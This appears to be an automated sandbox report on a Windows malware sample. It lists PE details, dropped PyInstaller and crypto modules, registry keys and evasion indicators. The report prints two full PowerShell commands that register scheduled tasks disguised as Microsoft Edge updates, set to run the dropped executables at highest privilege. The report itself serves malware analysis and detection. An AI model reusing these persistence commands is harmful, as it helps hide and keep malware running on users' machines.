Source: Binary string: SetupHost.pdb source: SetupHost.exe, SetupHost.exe, 0000000D.00000000.1779120957.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp
Source: Binary string: SetupPrep.pdb source: T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1685436843.0000029E76B04000.00000004.00000020.00020000.00000000.sdmp, LineInst.exe, LineInst.exe, 0000000B.00000003.1754464189.0000000006DB1000.00000004.00000020.00020000.00000000.sdmp, LineInst.exe, 0000000B.00000000.1745430758.0000000000A71000.00000020.00000001.01000000.0000000A.sdmp, LineInst.exe, 0000000B.00000003.1748979428.00000000038D0000.00000004.00000020.00020000.00000000.sdmp, LineInst.exe, 0000000B.00000003.1754333515.00000000038F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\_lzma.pdb source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659065496.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1795089608.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1831179551.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\unicodedata.pdb source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662729581.0000021C65B5C000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1801728812.000001F51FAD3000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1838911809.000001E3DC93E000.00000004.00000020.00020000.00000000.sdmp
Source: T1#U52a9#U624b1.0.1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: T1#U52a9#U624b1.0.1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: T1#U52a9#U624b1.0.1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: T1#U52a9#U624b1.0.1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: T1#U52a9#U624b1.0.1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\../LineInst.exe'; $Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date); $Principal = New-ScheduledTaskPrincipal -UserId 'user' -LogonType Interactive -RunLevel Highest; Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -TaskName 'MicrosoftEdgeUpdatesOnce' -Description 'MicrosoftEdgeUpdatesOnce once' -Force; Start-ScheduledTask -TaskName 'MicrosoftEdgeUpdatesOnce' "
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\../WinHex.exe'; $Trigger = New-ScheduledTaskTrigger -AtLogon; $Principal = New-ScheduledTaskPrincipal -UserId 'user' -LogonType Interactive -RunLevel Highest; Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -TaskName 'MicrosoftEdgeUpdatesOnceMe' -Description 'MicrosoftEdgeUpdatesOnce once You' -Force; Start-ScheduledTask -TaskName 'MicrosoftEdgeUpdatesOnceMe' "
Source: DU.dll.11.dr Static PE information: 0xC4ED75F0 [Tue Sep 11 13:02:40 2074 UTC]
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_0053DE32 __EH_prolog3_GS,memset,memset,memset,memset,memset,RtlGetVersion,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,SetLastError,GetLastError,LoadLibraryW,GetProcAddress,GlobalFree,GetLastError,GetLastError,RegOpenKeyExW,RegCloseKey,CompareStringW,CompareStringW,GetLastError,GetLastError,FreeLibrary,RegCloseKey, 13_2_0053DE32
Source: T1#U52a9#U624b1.0.1.exe Static PE information: section name: _RDATA
Source: VCRUNTIME140.dll.0.dr Static PE information: section name: _RDATA
Source: libcrypto-1_1.dll.0.dr Static PE information: section name: .00cfg
Source: libssl-1_1.dll.0.dr Static PE information: section name: .00cfg
Source: LineInst.exe.1.dr Static PE information: section name: .boxload
Source: WinHex.exe.1.dr Static PE information: section name: _RDATA
Source: SystemUpdate.exe.1.dr Static PE information: section name: _RDATA
Source: DU.dll.11.dr Static PE information: section name: .didat
Source: DiagTrack.dll.11.dr Static PE information: section name: .didat
Source: Diager.dll.11.dr Static PE information: section name: .didat
Source: setupplatform.dll.11.dr Static PE information: section name: .didat
Source: unbcl.dll.11.dr Static PE information: section name: .didat
Source: wdsutil.dll.11.dr Static PE information: section name: .didat
Source: libcrypto-1_1.dll.12.dr Static PE information: section name: .00cfg
Source: libssl-1_1.dll.12.dr Static PE information: section name: .00cfg
Source: VCRUNTIME140.dll.12.dr Static PE information: section name: _RDATA
Source: VCRUNTIME140.dll.19.dr Static PE information: section name: _RDATA
Source: libcrypto-1_1.dll.19.dr Static PE information: section name: .00cfg
Source: libssl-1_1.dll.19.dr Static PE information: section name: .00cfg
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Code function: 0_2_00007FF7A67810CC push rbp; retn 0000h 0_2_00007FF7A67810CD
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Code function: 0_2_00007FF7A67810E4 push rcx; retn 0000h 0_2_00007FF7A67810ED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B29D2A5 pushad ; iretd 2_2_00007FFD9B29D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B2BD2A5 pushad ; iretd 4_2_00007FFD9B2BD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B3D8CFD push ebx; retf 000Ch 4_2_00007FFD9B3D8D0A
Source: C:\Users\user\AppData\WinHex.exe Code function: 12_2_00007FF7C5C210E4 push rcx; retn 0000h 12_2_00007FF7C5C210ED
Source: C:\Users\user\AppData\WinHex.exe Code function: 12_2_00007FF7C5C210CC push rbp; retn 0000h 12_2_00007FF7C5C210CD
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_004C43D8 pushad ; iretd 13_2_004C43D9
Source: C:\$Windows.~WS\Sources\SetupHost.exe Code function: 13_2_0054F390 push ecx; ret 13_2_0054F3A3
Source: pidgenx.dll.11.dr Static PE information: section name: .text entropy: 6.807645664658098

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe Process created: "C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe"
Source: C:\Users\user\AppData\WinHex.exe Process created: C:\Users\user\AppData\Roaming\../WinHex.exe
Source: C:\Users\user\AppData\SystemUpdate.exe Process created: C:\Users\user\AppData\SystemUpdate.exe
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_BLAKE2b.pyd
Source: C:\Users\user\AppData\SystemUpdate.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80722\_bz2.pyd
Source: C:\Users\user\AppData\SystemUpdate.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80722\libssl-1_1.dll
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Util\_strxor.pyd
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ocb.pyd
Source: C:\Users\user\AppData\SystemUpdate.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80722\_socket.pyd
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_ghash_portable.pyd
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73322\_socket.pyd
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73322\select.pyd
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\_ctypes.pyd
Source: C:\Users\user\AppData\LineInst.exe File created: C:\$Windows.~WS\Sources\wdstptc.dll
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\_bz2.pyd
Source: C:\Users\user\AppData\LineInst.exe File created: C:\$Windows.~WS\Sources\DiagTrack.dll
Source: C:\Users\user\AppData\SystemUpdate.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80722\select.pyd
Source: C:\Users\user\AppData\LineInst.exe File created: C:\$Windows.~WS\Sources\wdsclientapi.dll
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_keccak.pyd
Source: C:\Users\user\AppData\LineInst.exe File created: C:\$Windows.~WS\Sources\wdscore.dll
Source: C:\Users\user\AppData\LineInst.exe File created: C:\$Windows.~WS\Sources\SetupHost.exe
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe File created: C:\Users\user\AppData\LineInst.exe
Source: C:\Users\user\AppData\LineInst.exe File created: C:\$Windows.~WS\Sources\unbcl.dll
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Util\_cpuid_c.pyd
Source: C:\Users\user\AppData\SystemUpdate.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80722\unicodedata.pyd
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73322\unicodedata.pyd
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe File created: C:\Users\user\AppData\SystemUpdate.exe
Source: C:\Users\user\AppData\LineInst.exe File created: C:\$Windows.~WS\Sources\WinDlp.dll
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\_lzma.pyd
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA1.pyd
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe File created: C:\Users\user\AppData\WinHex.exe
Source: C:\Users\user\AppData\SystemUpdate.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80722\libcrypto-1_1.dll
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_Salsa20.pyd
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\PublicKey\_ec_ws.pyd
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA384.pyd
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\PublicKey\_ed448.pyd
Source: C:\Users\user\AppData\LineInst.exe File created: C:\$Windows.~WS\Sources\SetupMgr.dll
Source: C:\Users\user\AppData\LineInst.exe File created: C:\$Windows.~WS\Sources\wdscsl.dll
Source: C:\Users\user\AppData\LineInst.exe File created: C:\$Windows.~WS\Sources\wpx.dll
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\python38.dll
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\VCRUNTIME140.dll
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_MD5.pyd
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73322\_hashlib.pyd
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_BLAKE2s.pyd
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ctr.pyd
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA512.pyd
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\libcrypto-1_1.dll
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_eksblowfish.pyd
Source: C:\Users\user\AppData\LineInst.exe File created: C:\$Windows.~WS\Sources\setupplatform.dll
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA224.pyd
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73322\_bz2.pyd
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_des.pyd
Source: C:\Users\user\AppData\SystemUpdate.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80722\python38.dll
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_aes.pyd
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Protocol\_scrypt.pyd
Source: C:\Users\user\AppData\SystemUpdate.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80722\_lzma.pyd
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\select.pyd
Source: C:\Users\user\AppData\LineInst.exe File created: C:\$Windows.~WS\Sources\wdsutil.dll
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA256.pyd
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_arc2.pyd
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\PublicKey\_x25519.pyd
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_pkcs1_decode.pyd
Source: C:\Users\user\AppData\LineInst.exe File created: C:\$Windows.~WS\Sources\SetupCore.dll
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ofb.pyd
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\libssl-1_1.dll
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ecb.pyd
Source: C:\Users\user\AppData\SystemUpdate.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80722\_ssl.pyd
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_MD2.pyd
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_RIPEMD160.pyd
Source: C:\Users\user\AppData\LineInst.exe File created: C:\$Windows.~WS\Sources\wdsimage.dll
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_blowfish.pyd
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\unicodedata.pyd
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_cbc.pyd
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73322\python38.dll
Source: C:\Users\user\AppData\LineInst.exe File created: C:\$Windows.~WS\Sources\pidgenx.dll
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_poly1305.pyd
Source: C:\Users\user\AppData\SystemUpdate.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80722\_hashlib.pyd
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\_hashlib.pyd
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_MD4.pyd
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Math\_modexp.pyd
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_ghash_clmul.pyd
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\PublicKey\_ed25519.pyd
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe File created: C:\Users\user\AppData\Local\Temp\_MEI73322\_lzma.pyd
Source: C:\Users\user\AppData\LineInst.exe File created: C:\$Windows.~WS\Sources\DU.dll
Source: C:\Users\user\AppData\WinHex.exe File created: C:\Users\user\AppData\Local\Temp\_MEI78122\_socket.pyd
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_cast.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_aesni.pydJump to dropped file
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73322\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeFile created: C:\$Windows.~WS\Sources\MediaSetupUIMgr.dllJump to dropped file
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73322\libssl-1_1.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_des3.pydJump to dropped file
Source: C:\Users\user\AppData\SystemUpdate.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80722\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeFile created: C:\$Windows.~WS\Sources\DiagTrackRunner.exeJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\libffi-7.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_cfb.pydJump to dropped file
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73322\_ssl.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_chacha20.pydJump to dropped file
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73322\libcrypto-1_1.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\_ssl.pydJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeFile created: C:\$Windows.~WS\Sources\Diager.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_ARC4.pydJump to dropped file
Source: C:\$Windows.~WS\Sources\SetupHost.exeFile created: C:\$Windows.~WS\Sources\Panther\setuperr.log
Source: C:\$Windows.~WS\Sources\SetupHost.exeFile created: C:\$Windows.~WS\Sources\Panther\setupact.log
Source: C:\$Windows.~WS\Sources\SetupHost.exeFile created: C:\$WINDOWS.~BT\Sources\Panther\setuperr.log
Source: C:\$Windows.~WS\Sources\SetupHost.exeFile created: C:\$WINDOWS.~BT\Sources\Panther\setupact.log
Source: C:\$Windows.~WS\Sources\SetupHost.exeFile created: C:\$Windows.~WS\Sources\Panther\Eula.rtf

Boot Survival

Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\../LineInst.exe'; $Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date); $Principal = New-ScheduledTaskPrincipal -UserId 'user' -LogonType Interactive -RunLevel Highest; Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -TaskName 'MicrosoftEdgeUpdatesOnce' -Description 'MicrosoftEdgeUpdatesOnce once' -Force; Start-ScheduledTask -TaskName 'MicrosoftEdgeUpdatesOnce' "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (8 identical entries collapsed)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (6 identical entries collapsed)
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Code function: 0_2_00007FF7A67355D0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00007FF7A67355D0
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\WinHex.exe | Key value created or modified: HKEY_CURRENT_USER\Console\1 d33f351a4aeea5e608853d1a56661059
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (200 identical entries collapsed)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\LineInst.exe | Process information set: NOOPENFILEERRORBOX (11 occurrences)
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Process information set: NOOPENFILEERRORBOX (29 occurrences)

Malware Analysis System Evasion

Source: C:\$Windows.~WS\Sources\SetupHost.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\WinHex.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{05DF8D13-C355-47F4-A11E-851B338CEFB8}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7058, 2548, 8223, 1097
Source: C:\Users\user\AppData\WinHex.exe | Window / User API: threadDelayed 732
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Dropped PE file which has not been started (10 files, all under C:\Users\user\AppData\Local\Temp\_MEI73322\):
    _bz2.pyd, _hashlib.pyd, _lzma.pyd, _socket.pyd, _ssl.pyd, libcrypto-1_1.dll, libssl-1_1.dll, python38.dll, select.pyd, unicodedata.pyd
Source: C:\Users\user\AppData\SystemUpdate.exe | Dropped PE file which has not been started (10 files, all under C:\Users\user\AppData\Local\Temp\_MEI80722\):
    _bz2.pyd, _hashlib.pyd, _lzma.pyd, _socket.pyd, _ssl.pyd, libcrypto-1_1.dll, libssl-1_1.dll, python38.dll, select.pyd, unicodedata.pyd
Source: C:\Users\user\AppData\WinHex.exe | Dropped PE file which has not been started (52 files, all under C:\Users\user\AppData\Local\Temp\_MEI78122\):
    _bz2.pyd, _ctypes.pyd, _hashlib.pyd, _lzma.pyd, _socket.pyd, _ssl.pyd, libcrypto-1_1.dll, libssl-1_1.dll, python38.dll, select.pyd, unicodedata.pyd
    Crypto\Cipher\: _ARC4.pyd, _Salsa20.pyd, _chacha20.pyd, _pkcs1_decode.pyd, _raw_aes.pyd, _raw_aesni.pyd, _raw_arc2.pyd, _raw_blowfish.pyd, _raw_cast.pyd, _raw_cbc.pyd, _raw_cfb.pyd, _raw_ctr.pyd, _raw_des.pyd, _raw_des3.pyd, _raw_ecb.pyd, _raw_eksblowfish.pyd, _raw_ocb.pyd, _raw_ofb.pyd
    Crypto\Hash\: _BLAKE2b.pyd, _BLAKE2s.pyd, _MD2.pyd, _MD4.pyd, _MD5.pyd, _RIPEMD160.pyd, _SHA1.pyd, _SHA224.pyd, _SHA256.pyd, _SHA384.pyd, _SHA512.pyd, _ghash_clmul.pyd, _ghash_portable.pyd, _keccak.pyd, _poly1305.pyd
    Crypto\Math\: _modexp.pyd
    Crypto\Protocol\: _scrypt.pyd
    Crypto\PublicKey\: _ec_ws.pyd, _ed25519.pyd, _ed448.pyd, _x25519.pyd
    Crypto\Util\: _cpuid_c.pyd, _strxor.pyd
Source: C:\Users\user\AppData\LineInst.exe | Dropped PE file which has not been started (15 files, all under C:\$Windows.~WS\Sources\):
    DU.dll, DiagTrack.dll, DiagTrackRunner.exe, Diager.dll, MediaSetupUIMgr.dll, SetupCore.dll, SetupMgr.dll, pidgenx.dll, setupplatform.dll, wdsclientapi.dll, wdscsl.dll, wdsimage.dll, wdstptc.dll, wdsutil.dll, wpx.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
